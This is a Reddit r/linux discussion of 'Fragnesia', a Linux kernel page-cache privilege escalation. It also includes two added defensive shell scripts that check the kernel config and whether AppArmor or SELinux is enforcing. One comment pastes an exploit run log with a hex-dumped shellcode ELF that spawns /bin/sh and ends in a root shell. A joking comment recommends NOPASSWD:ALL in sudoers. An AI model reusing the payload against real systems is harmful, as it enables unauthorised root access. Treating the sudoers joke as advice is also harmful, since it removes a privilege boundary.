Fragnesia: ANOTHER Linux Security Vulnerability!
Posted by HUSKYSPIN@reddit | linux | 37 comments
Another Linux vulnerability in the same category as Dirty Frag has been found! Another eight more of these, I guess? In any case the fatigue is coming up for me. Things are getting crazy!
"It abuses a logic bug in the Linux XFRM ESP-in-TCP subsystem to achieve arbitrary byte writes into the kernel page cache of read-only files, without requiring any race condition."
American_Jesus@reddit
2026 the year of Linux ~~desktop~~ exploits
PrimusSkeeter@reddit
Exploits will always be discovered. I would worry more if no exploits are ever discovered, because nothing is perfect.
shroddy@reddit
It seems to me more and more that the Linux kernel is no longer capable of providing a proper security boundary, at least not without an extensive amount of hardening that only Android achieved so far.
anto77_butt_kinkier@reddit
If Windows were open source and AIs were able to scan through every byte of its source code, look at different implementations of its various subsystems, etc., then we would be seeing this same amount of security vulnerabilities being discovered. At the very least Linux is having these discovered, published, and mitigated. Meanwhile Windows, macOS, iOS, etc. vulns are somewhat harder to find but are just as numerous. Meaning that while Linux (really any open-source OS) is able to discover and patch all of these, closed-source OSes are relying more on security through obscurity. Essentially just hoping that the "good guys" find the vulnerability before the "bad guys".
hpxvzhjfgb@reddit
Windows 11 has already had over 150 privilege escalation bugs this year alone.
snail1132@reddit
How many have been patched?
hpxvzhjfgb@reddit
This number is a rough estimate I took from articles summarising patch notes for each month. But I also saw that there was one called RedSun found about a month ago that is still fully unpatched.
telmo_trooper@reddit
That is not the problem at all. It's a huge open source project with a bunch of manual memory operations that is being thoroughly scanned by fuzzing tools. Things are likely to stabilize soon, in the meantime there's not much we can do.
Scoutron@reddit
If you are completely sensationalized you may come to that conclusion
AtlanticPortal@reddit
On Debian 13, by default, it doesn't work. At least I keep having reasons not to use Ubuntu.
FLMKane@reddit
Elaborate?
AtlanticPortal@reddit
Debian does not have its kernel compiled with the CONFIG_INET_ESPINTCP option set. This variant uses ESP_IN_TCP (basically the IPsec protocol inside a TCP packet instead of a UDP packet), but if the support is not compiled into the kernel there is nothing to exploit.
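If you want to verify the point above on your own machine rather than take a distro's word for it, here is an added example (not code from the thread or from the PoC project) that reads the running kernel's config from /boot/config-$(uname -r) or /proc/config.gz and reports whether CONFIG_INET_ESPINTCP is set. The function names and the enabled/disabled/unknown vocabulary are this example's own conventions, and the sample config text embedded in it is constructed, not taken from any real distro.

```shell
#!/bin/sh
# Added example, not code from the thread or the PoC project.
# Reports whether the running kernel was built with CONFIG_INET_ESPINTCP,
# the option the comment above says Debian leaves unset. Function names and
# the enabled/disabled/unknown vocabulary are this example's own conventions.

# espintcp_state: read a kernel .config on stdin, print one word and return:
#   enabled  (0)  CONFIG_INET_ESPINTCP=y
#   disabled (1)  "# CONFIG_INET_ESPINTCP is not set", or the option is absent
#                 from an otherwise valid config
#   unknown  (2)  input does not look like a kernel config at all
espintcp_state() {
    cfg_text="$(cat)"
    # A kernel config always carries CONFIG_ lines; refuse to conclude
    # anything from empty or unrelated input.
    printf '%s\n' "$cfg_text" | grep -q '^CONFIG_' || { echo unknown; return 2; }
    if printf '%s\n' "$cfg_text" | grep -q '^CONFIG_INET_ESPINTCP=y'; then
        echo enabled
        return 0
    fi
    echo disabled
    return 1
}

# running_kernel_config: print the running kernel's config text, preferring
# the distro's /boot copy and falling back to /proc/config.gz (present only
# when the kernel was built with CONFIG_IKCONFIG_PROC). Prints nothing if
# neither is readable.
running_kernel_config() {
    boot_cfg="/boot/config-$(uname -r)"
    if [ -r "$boot_cfg" ]; then
        cat "$boot_cfg"
    elif [ -r /proc/config.gz ]; then
        zcat /proc/config.gz
    else
        return 1
    fi
}

# check_running_kernel: combine the two and print a short verdict.
check_running_kernel() {
    state="$(running_kernel_config | espintcp_state)" || :
    echo "CONFIG_INET_ESPINTCP for kernel $(uname -r): $state"
    case "$state" in
        enabled)  echo "ESP-in-TCP support is compiled in; track your distro's fix for this bug." ;;
        disabled) echo "ESP-in-TCP support is absent; the XFRM ESP-in-TCP path discussed above is not built." ;;
        unknown)  echo "No readable config found; install your distro's kernel config/headers package and rerun." ;;
    esac
}

# Constructed sample configs (not real distro configs) showing both outcomes:
SAMPLE_WITH_ESPINTCP='CONFIG_INET_ESP=m
CONFIG_INET_ESPINTCP=y'
SAMPLE_WITHOUT_ESPINTCP='CONFIG_INET_ESP=m
# CONFIG_INET_ESPINTCP is not set'

echo "constructed config with option:    $(printf '%s\n' "$SAMPLE_WITH_ESPINTCP" | espintcp_state)"     # enabled
echo "constructed config without option: $(printf '%s\n' "$SAMPLE_WITHOUT_ESPINTCP" | espintcp_state)"  # disabled
check_running_kernel
```

The check deliberately distinguishes "disabled" from "unknown": a container or minimal image that ships no kernel config at all should not be reported as safe just because the grep found nothing.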
FLMKane@reddit
Thanks.
fellipec@reddit
Run your system with NOPASSWD:ALL in the sudoers file and you'll never care about those vulnerabilities again.
Klutzy-Condition811@reddit
If you do that, why not always run as root? Best of both worlds: no need for sudo, all the benefits of having all the privileges 😉
fellipec@reddit
Some software complains if you run as root (ask me how I know).
Journeyj012@reddit
I would ask more, but it seems you don't know.
FLMKane@reddit
yay
Acidhawk_0@reddit
Or he didn't know .... but does now...
FLMKane@reddit
You use Arch btw?
yay
daveedave@reddit
Cries in Raspberry
PusheenButtons@reddit
Cries in most cloud marketplace images
VisualMysterious1003@reddit
A result of Linus choosing stability over security.
Its becomes a serious liability now.
Riemero@reddit
Lol k
shroddy@reddit
I had to copy and paste your comment into another program to know if you wanted to write "its" with an uppercase i or "Lts" with a lowercase L
(Both would be correct in this case)
DismalEggselent@reddit
So, is there any way that a change in the overall way that the page caching currently works could render this class of vulnerabilities moot?
BCMM@reddit
Do these AI companies just not do coordinated disclosure?
arades@reddit
Copyfail was coordinated, just with a very short timeline. Dirtyfrag was coordinated, but attackers discovered the vulnerability just by analyzing commits to various kernel trees, so they disclosed early.
The era of 90-day disclosure and systems already being fully patched before people know is probably gone. It's too easy to point an AI at git logs to find security patches, let alone finding new ones, for that long of a disclosure to matter.
The concept of coordinated disclosure also isn't universally seen as more secure. Some security researchers lament it, particularly for delaying action on critical issues.
bunkbail@reddit
Doesn't seem to work on mine (Chimera Linux). It doesn't seem to have any root access still:
[*] smashing 192 bytes into read-only page cache  changed=176  skipped=16  remaining=0
0000  7f 45 4c 46 02 01 01 00  00 00 00 00 00 00 00 00
0010  02 00 3e 00 01 00 00 00  78 00 40 00 00 00 00 00
0020  40 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
0030  00 00 00 00 40 00 38 00  01 00 00 00 00 00 00 00
0040  01 00 00 00 05 00 00 00  00 00 00 00 00 00 00 00
0050  00 00 40 00 00 00 00 00  00 00 40 00 00 00 00 00
0060  b8 00 00 00 00 00 00 00  b8 00 00 00 00 00 00 00
0070  00 10 00 00 00 00 00 00  31 ff 31 f6 31 c0 b0 6a
0080  0f 05 b0 69 0f 05 b0 74  0f 05 6a 00 48 8d 05 12
0090  00 00 00 50 48 89 e2 48  8d 3d 12 00 00 00 31 f6
00a0  6a 3b 58 0f 05 54 45 52  4d 3d 78 74 65 72 6d 00
00b0  2f 62 69 6e 2f 73 68 00  00 00 00 00 00 00 00 00
[==================================================] 192/192 (100%)
────────────────────────────────────────────────────────────
sender_ns_uid=0 euid=0 prefix_send=18 splice_to_tcp=4096 file_off=188 file_off_next=4284
[*] verifying 192 bytes...
spintcp_enabled_after_queue=1
[*] bytes_flip_summary len=192 changed=176 skipped=16
[+] BUG: changed requested copied byte range to desired values
byte_flip_nonce=211 stream_byte=1c
byte_flip_packet_iv=cccccccc000000d3
[*] [190/192] +00bd  1c -> 00  xor=1c seq=175 nonce=211
firing espintcp splice...
sender_ns_uid=0 euid=0 prefix_send=18 splice_to_tcp=4096 file_off=189 file_off_next=4285
receiver_ns_uid=0 euid=0 espintcp_enabled_after_queue=1
sender_status=0 receiver_status=0
[+] smashed 1c -> 00  index=189 offset=+00bd
byte_flip_nonce=5 stream_byte=db
byte_flip_packet_iv=cccccccc00000005
[*] [191/192] +00be  db -> 00  xor=db seq=176 nonce=5
firing espintcp splice...
sender_ns_uid=0 euid=0 prefix_send=18 splice_to_tcp=4096 file_off=190 file_off_next=4286
receiver_ns_uid=0 euid=0 espintcp_enabled_after_queue=1
sender_status=0 receiver_status=0
[+] smashed db -> 00  index=190 offset=+00be
byte_flip_nonce=51 stream_byte=c7
byte_flip_packet_iv=cccccccc00000033
[*] [192/192] +00bf  c7 -> 00  xor=c7 seq=177 nonce=51
firing espintcp splice...
sender_ns_uid=0 euid=0 prefix_send=18 splice_to_tcp=4096 file_off=191 file_off_next=4287
receiver_ns_uid=0 euid=0 espintcp_enabled_after_queue=1
sender_status=0 receiver_status=0
[+] smashed c7 -> 00  index=191 offset=+00bf
# id
uid=0(root) gid=0(root) groups=65534(nogroup),0(root)
# dmesg
dmesg: read kernel buffer failed: Operation not permitted
moralesnery@reddit
The README states that mitigation measures are the same as for Dirty Frag.
AmarildoJr@reddit
But will the kernel patch made for Dirty Frag mitigate this issue as well? Because blacklisting modules isn't really a permanent solution, especially for those that need them.
If the patch made for Dirty Frag doesn't work here then it should be classified as a critical vulnerability.
FiveGrayCats@reddit
Yep, and if dirty frag kernel patches fix this vulnerability, then it's the same vulnerability, and not capslocked ANOTHER...
ItzDerock@reddit
The TUI in the PoC video gives Cyberpunk 2077 datamine UI vibes.
Meuslon3D@reddit
I really love exploits where I first need to disable AppArmor to make them "work". Anyway, you can find almost infinite ways for local privilege escalation. This can turn out bad, but as long as there are any RCE exploits, most users are safe.
AtlanticPortal@reddit
Well, that's what SELinux/AppArmor are for. Thankfully they work pretty well. Unfortunately many people disable them as soon as they install their machine.
dontquestionmyaction@reddit
Most distros ship with no AppArmor enforcement, so...
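Whether your own box is in the "no enforcement" group the two comments above describe is something the kernel will tell you directly. The following is an added example (not code from the thread) that reads the active-LSM list from securityfs, counts how many loaded AppArmor profiles are actually in enforce mode rather than complain mode, and reports the SELinux enforcing flag where SELinux is active. The function names and output wording are this example's own, and the profile listing embedded in it is constructed, not captured from a real host.

```shell
#!/bin/sh
# Added example, not code from the thread. Summarises whether a mandatory
# access control LSM is actually enforcing on this host, using only files
# the kernel itself exposes:
#   /sys/kernel/security/lsm                 active LSMs, comma separated
#   /sys/kernel/security/apparmor/profiles   one "name (mode)" line per loaded profile
#   /sys/fs/selinux/enforce                  1 = enforcing, 0 = permissive
# Function names and the output wording are this example's own.

# apparmor_mode_counts: read the profiles listing on stdin and print how many
# loaded profiles are in enforce, complain or any other mode. AppArmor being
# "enabled" with zero enforce-mode profiles confines nothing.
apparmor_mode_counts() {
    enforce=0; complain=0; other=0
    while IFS= read -r line; do
        case "$line" in
            "")              ;;
            *" (enforce)")   enforce=$((enforce + 1)) ;;
            *" (complain)")  complain=$((complain + 1)) ;;
            *)               other=$((other + 1)) ;;
        esac
    done
    echo "enforce=$enforce complain=$complain other=$other"
}

# apparmor_verdict: "enforcing" if at least one profile is in enforce mode,
# otherwise "not-enforcing". Takes the counts line produced above.
apparmor_verdict() {
    case "$1" in
        "enforce=0 "*) echo not-enforcing ;;
        "enforce="*)   echo enforcing ;;
        *)             echo unknown ;;
    esac
}

# lsm_summary: live report for the current host (profile list needs root).
lsm_summary() {
    active="$(cat /sys/kernel/security/lsm 2>/dev/null)" || active=""
    echo "active LSMs: ${active:-unknown (securityfs not readable)}"
    case ",$active," in
        *,apparmor,*)
            if [ -r /sys/kernel/security/apparmor/profiles ]; then
                counts="$(apparmor_mode_counts < /sys/kernel/security/apparmor/profiles)"
                echo "apparmor: $counts -> $(apparmor_verdict "$counts")"
            else
                echo "apparmor: profile list not readable (rerun as root)"
            fi
            ;;
    esac
    case ",$active," in
        *,selinux,*)
            mode="$(cat /sys/fs/selinux/enforce 2>/dev/null)" || mode="?"
            echo "selinux: enforce=$mode (1 = enforcing, 0 = permissive)"
            ;;
    esac
}

# Constructed sample listing (not from a real host) to show the parsing:
SAMPLE_PROFILES='/usr/sbin/cupsd (enforce)
/usr/bin/man (enforce)
firefox (complain)
/usr/lib/snapd/snap-confine (enforce)'
SAMPLE_COUNTS="$(printf '%s\n' "$SAMPLE_PROFILES" | apparmor_mode_counts)"
echo "constructed sample: $SAMPLE_COUNTS -> $(apparmor_verdict "$SAMPLE_COUNTS")"
# -> constructed sample: enforce=3 complain=1 other=0 -> enforcing
lsm_summary
```

Complain-mode profiles only log what they would have blocked, so a host whose only profiles are in complain mode gets the same "not-enforcing" verdict as one with AppArmor absent; that is the distinction a local-privilege-escalation PoC cares about.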
flying-sheep@reddit
Yeah, they still matter immensely for multi-user systems like HPC